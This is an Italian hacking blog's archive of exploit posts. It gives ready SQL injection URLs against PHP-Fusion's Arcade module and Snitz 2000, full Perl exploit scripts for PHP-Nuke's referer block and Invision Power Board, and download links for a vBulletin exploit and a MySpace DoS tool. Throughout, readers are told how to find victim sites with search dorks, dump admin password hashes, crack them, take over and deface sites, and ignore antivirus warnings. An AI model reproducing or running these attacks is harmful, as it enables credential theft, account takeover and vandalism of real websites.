Archive for the 'Exploit' Category

Exploit PHP-FUSION Arcade Module (cid) Remote SQL Injection Vulnerability

Un altro exploit by Xoron, il bug affligge PHP-Fusion precisamente il modulo Arcade, è una remote SQL Injection.

Inanzitutto possiamo aiutare qualche webmaster sprovveduto che non ha ancora aggiornato il suo portale,

possiamo trovare siti vulnerabili con una GOOGLE DORK, facciamo una ricerca su google scrivendo: /infusions/arcade/, non appena troviamo un sito vulnerabile possiamo avvisare l’amministratore del bug.

Il bug è nell’ index.php, basta aggiungere all’indirizzo http://indirizzovittima.com/infusions/arcade/

la stringa:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/

null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

Aggiorniamo la pagina, se l’exploit ha funzionato il modulo Arcade ci mostrerà gli User e le password criptate in Hash MD5, copiamo i dati dell’admin, e diamo in pasto l’hash a passcracking.ru.

Non appena il cracker ci restituisce la password in chiaro, possiamo effettuare l’accesso al portale con l’account dell’Admin, possiamo defacciare il sito con un redirect ad un nostro indirizzo con una nostra grafica personalizzata che indica il bug e i possibili rimedi, mi raccomando niente danni! 😉

Un vero hacker si limita soltando a segnalare i bug e a dare spiegazioni su come risolverli, non distrugge nulla!

Adesso vi saluto! Alla prossima! Ciau 🙂

Exploit Snitz 2000 Version 3.1 SR4 Remote SQL Injection Vulnerability

Un exploit powered by XORON, una Remote SQL Injection Vulnerability per i Forum SNITZ 2000 v3.1 SR4.

Il funzionamento è semplcissimo, la vulnerabilità è nella pagina pop_profile.asp:

trovare l’username dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?mode=display&id=1

esempio: http://forumvittima.it/pop_profile.asp?mode=display&id=1

vi comparirà il nick dell’Admin;

trovare la password dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?

mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9

,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS

Ecco che compare l’hash MD5 della password, adesso basta crackarla con il cracker di milw0rm.
Voilà avete il pieno controllo del Forum!

Bye Bye 😉

Exploit vBulletin 3.6.4 inlinemod.php postids SQL Injection

Oggi sono in vena di exploit!

Eccovene un altro in PHP, si tratta di un SQL INJECTION nell’inlinemod.php di un vBulletin 3.6.4 .

Per utilizzare un exploit in PHP abbiamo bisogno di un webserver e dell’intrerprete, vi consiglio di installare il pacchetto EasyPHP, che comprende oltre al server web Apache anche MySQL, vi può sempre ritornare utile!

Successivamente installiamo il PHP, dopodiche non vi resta che copiare il codice dell’exploit in un blocconote, inserite la pagina salvata con estensione .php nella cartella www di EasyPHP e aprite il vostro Browser.

Adesso nella barra scrivete “http://localhost/nomeexploit.php”, vi appariranno le istruzioni, configurate, compilate e eseguitelo da DOS con questo comando “C:\*exploit_path*\>nomeexploit.php”.

Scarica l’exploit -> vbulletin.zip

PHP-Nuke Http Referers Remote SQL-Injection Exploit (NON FIXATA)

Un pericoloso bug affligge tutte le versioni di PHP-NUKE, il bug sottostante è nell’index.php, dopo aver fatto girare il nostro exploit, il blocco referenti ci mostrerà il l’user e la password dell’admin criptata in hash md5. Successivamente non vi resta che usare il cracker md5 di Milw0rm per crackare la password.

$db->sql_query(”INSERT INTO “.$prefix.”_referer VALUES (NULL, ‘”.$referer.”‘)”)

Questa è una 0day, non è ancora stata fixata, l’unico consiglio che posso dare ai meno esperti è quello di togliere il blocco referenti, invece chi è pratico di PHP con poche modifiche al codice può tappare questa enorme falla.

Codice exploit:

#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]You can see login and hash on web page in 'HTTP referers' block
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help()
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres)
my ($respone,$referer)
banner()
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer)
$respone=$ua->request($zadanie)
$respone->is_success or die "$adres : ",$respone->message,"\n";
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer)
$respone=$ua->request($zadanie)
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]You can see login and hash on web page in 'HTTP referers' block\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
print "Use:\n";
print "\tperl exploit.pl [url]\n";
print "\t[url]-vicitim webpage with index.php\n";
print "Example:\n";
print "\tperl exploit.pl http://phpnuke.org/index.php\n";
exit(0)
}

Happy Testing! 😉

Invision Power Board SQL Injenction Exploit 2.1 -> 2.1.6

Precedentemente avevo scritto un articolo su un Exploit in perl che sfruttava una SQL Injection su un Invison Power Board <=2.0.3, andate a rivedere l’articolo, il funzionamento è identico al precendete exploit, non dovete specificare il numero di versione del Forum perchè si tratta della stessa serie! 😉

Eccovi il codice:

#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
&header()
if (@ARGV < 2) {&info() exit()}
$server = $ARGV[0];
$dir = $ARGV[1];
print "
SERVER {$server}\r\n";
print "
DIR {$dir}\r\n";
#Step 1, detecting vulnerability
print "[1] Testing forum vulnerability...";
$q = "UNION SELECT 'VULN',1,1,1/*";
query($q,$server,$dir)
if($rep =~/VULN/){ print "forum vulnerable\r\n"; }
else
{
print "forum unvulnerable\r\n";
&footer()
exit()
}
#Step 2, detecting prefix
print "[2] Searching prefix...";
$q = "";
query($q,$server,$dir)
$prefix = $rep;
print $prefix."\r\n";
#Step 3, make query
print "[3] Performing query; it may take several minutes, plz, wait...\r\n";
$q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM ".$prefix."members_converge/*";
query($q1,$server,$dir)
$kol = $rep;
open(RES,">".$server."_result.txt")
for($id = 1; $id <= $kol; $id++)
{
$own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
query($own_query,$server,$dir)
if($rep=~/[0-9a-f]{32}/i)
{
$hash = $rep;
$own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
query($own_query,$server,$dir)
if(length($rep)==5)
{
$salt = $rep;
$own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
query($own_query,$server,$dir)
if(length($rep)>0)
{
$email = $rep;
print RES $id.":".$hash.":".$salt."::".$email."\n";
}
}
}
}
close(RES)
print "[!] Query was successfully perfomed. Results are in txt files\r\n";
&footer()
$ex = ;
sub footer()
{
print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";
print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";
}
sub header()
{
print q(
----------------------------------------------------------
* Invision Power Board 2.1.* Remote SQL Injecton Exploit *
* Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) *
* Coded by w4g.not null *
* FOR EDUCATIONAL PURPOSES *ONLY* *
----------------------------------------------------------
)
}
sub info()
{
print q(
Usage: perl w4gipb216.pl [server] [/dir/]
where
|- server - server, where IPB installed without http://
|- /dir/ - dir, where IPB installed or / for no dir
e.g perl w4gipb216.pl someserver.com /forum/
Stealing info about users (format id:pass:salt::email)
[!] Need MySQL > 4.0
)
}
sub query()
{
my($q,$server,$dir) = @_;
$res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q)
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
else
{
if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }
}
}
return $rep;
}

Buon Testing! 😉

Exploit: Attacco DoS remoto myspace.com

Oggi vi porto a conoscenza di un exploit in perl, che ho tradotto personalmente in italiano, se l’aprite con blocco note potete leggere le istruzioni, si tratta di un un attacco DoS o “Denial of Service” ad un account qualsiasi di myspace.com.

L’exploit è semplice da usare, si avvia col DOS, mi raccomando bisogna posizionarsi nella cartella ove risiede l’exploit con un comando DOS esempio: “cd Desktop”, se l’exploit è sul nostro desktop, successivamente scrivere: spacedos.pl vittima@providervittima.it.

Attendere che l’exploit effettui l’attacco o premere Ctrl+C per arrestarlo.

Cosa è un DoS?

 

Un attacco DoS o Denail of Service, letteralmente negazione del servizio. In questo tipo di attacco si cerca di portare il funzionamento di un sistema informatico che fornisce un servizio, ad esempio un sito web, al limite delle prestazioni, lavorando su uno dei parametri d’ingresso, fino a renderlo non più in grado di erogare il servizio.

Scarica l’exploit -> spacedos.pl

 

 

Invision Power Board SQL Injenction Exploit

Cosa è un exploit?

Un exploit è un termine usato in informatica per identificare un metodo che, sfruttando un bug o una vulnerabilità, porta all’acquisizione di privilegi o al Denial Of Service di un computer.

Eccovi un exploit in perl corredato di istruzioni, si tratta di una SQL INJECTION, da provare sui vostri forum Invision Power Board, vi svela la password di un qualsiasi utente in formato hash MD5, quindi anche quella dell’amministratore! 😉

Dopo non dovrete far altro che crackare la password con un password cracker online: Passcracking.ru, Milw0rm.com o scaricatevi questo CrackerMD5 da usare in locale.

Le versioni col bug vanno dalla 1.x alla 2.0.3, basta compilare il codice sottostante con ActivePerl e lanciare il programma da DOS.

L’antivirus potrebbe segnalarvelo, ma tranquilli, procedete ugualmente.

Buon testing!

Codice:

#!/usr/bin/perl

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] RICERCA PASSWORD IN CORSO ... [|]";

($cmember_id = $member_id) =~

s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b IL SITO è FIXATO! ]";
}
exit();
}
else
{
$allchar .= chr($i);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 =

"%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh =

"%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%

26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21"

;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>

"$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin

HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s;

pass_hash=%s%s%s%s%s\nConnection: close\n\n",

$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_

hash3,$nmalykh);

while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
print q(
Invision Power Board v <= 2.0.3 SQL Injection exploit
============================================================
ISTRUZIONI:
************************************************************
ipbexploit.pl [Host] [/cartellaIPB/] [utente] [IPBversione]

[server] -> Host da attaccare
[/folder/] -> Cartella dove è installato IPB
[member_id] -> Numero dell'utente da attaccare

target:
0 -> per versioni 1.x
1 -> per versioni 2.x (fino alla 2.0.3)

Esempio ipbexploit.pl http://www.sitovittima.it /forums/ 1 1
**************************************************************
==============================================================
Tradotto in Italiano Da UnderGround0
About -> underground0@hotmail.it
Programmer: 1dt.w0lf; RST/GHC; http://ghc.ru
);
exit();
}


Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,052,448 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

maggio: 2017
L M M G V S D
« Ago    
1234567
891011121314
15161718192021
22232425262728
293031